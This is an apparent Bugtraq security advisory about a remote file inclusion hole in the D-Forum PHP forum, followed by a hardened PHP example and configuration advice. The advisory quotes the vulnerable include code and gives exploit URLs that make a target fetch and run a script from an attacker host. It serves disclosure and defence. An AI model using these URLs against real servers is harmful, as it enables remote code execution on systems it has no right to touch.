D-Forum (PHP)
From: Frog Man (leseulfrog@hotmail.com)
Date: 02/16/03
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sun, 16 Feb 2003 18:06:15 +0100

Information :
°°°°°°°°°°°°°°
Website : http://www.adalis.fr/adalis.html
Versions : 1.00 -> 1.11
Problem : Include file
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/includes/header.php3 :
---------------------------
<?php
if ($my_header!="")
{
include ($my_header);
} else {
?>
...
--------------------------
/includes/footer.php3 :
---------------------------
...
if ($my_footer!="")
{
include ($my_footer);
} else {
?>
...
---------------------------
Exploits :
°°°°°°°°°°
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt
or
http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt
with
http://[attacker]/script.txt
Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info .
More details :
°°°°°°°°°°°°°°
(in French) http://www.frog-man.org/tutos/5holes8.txt
frog-m@n
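
An added example, not part of the original advisory and not the phpsecure.info patch: one way to harden the include pattern shown in header.php3 and footer.php3, by mapping a configuration key to an allowlisted local file instead of passing the variable straight to include. The names TEMPLATE_DIR, ALLOWED_TEMPLATES and resolve_template, and the template file names, are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical names throughout (TEMPLATE_DIR, ALLOWED_TEMPLATES,
// resolve_template); this is not D-Forum's code or the phpsecure.info patch.
const TEMPLATE_DIR = __DIR__ . '/templates';
const ALLOWED_TEMPLATES = [
    'default_header' => 'header_default.php',
    'custom_header'  => 'header_custom.php',
    'custom_footer'  => 'footer_custom.php',
];

/**
 * Map a template key to a file inside TEMPLATE_DIR.
 * Anything that is not an allowlisted key returns null, so URLs, stream
 * wrappers and ../ sequences never reach include.
 */
function resolve_template(string $key): ?string
{
    if (!array_key_exists($key, ALLOWED_TEMPLATES)) {
        return null;
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . ALLOWED_TEMPLATES[$key]);
    // realpath() is false for missing files; the prefix check catches a
    // symlink that points outside the template directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// The key comes from application configuration, never from the request.
// In the original files $my_header / $my_footer could be set from the query
// string (register_globals) when the include file was requested directly.
$my_header = 'custom_header'; // constructed sample value

$file = resolve_template($my_header);
if ($file !== null) {
    include $file;
} else {
    echo "<!-- built-in header -->\n"; // same fallback role as the original else branch
}

// Constructed check: the value shape used in the advisory's URLs is rejected.
var_dump(resolve_template('http://attacker.invalid/script.txt')); // key not in allowlist
```

Independently of the code change, `allow_url_include = Off` in php.ini (the default since PHP 5.2) stops include from fetching remote URLs, and the web server can deny direct requests to the /includes/ directory.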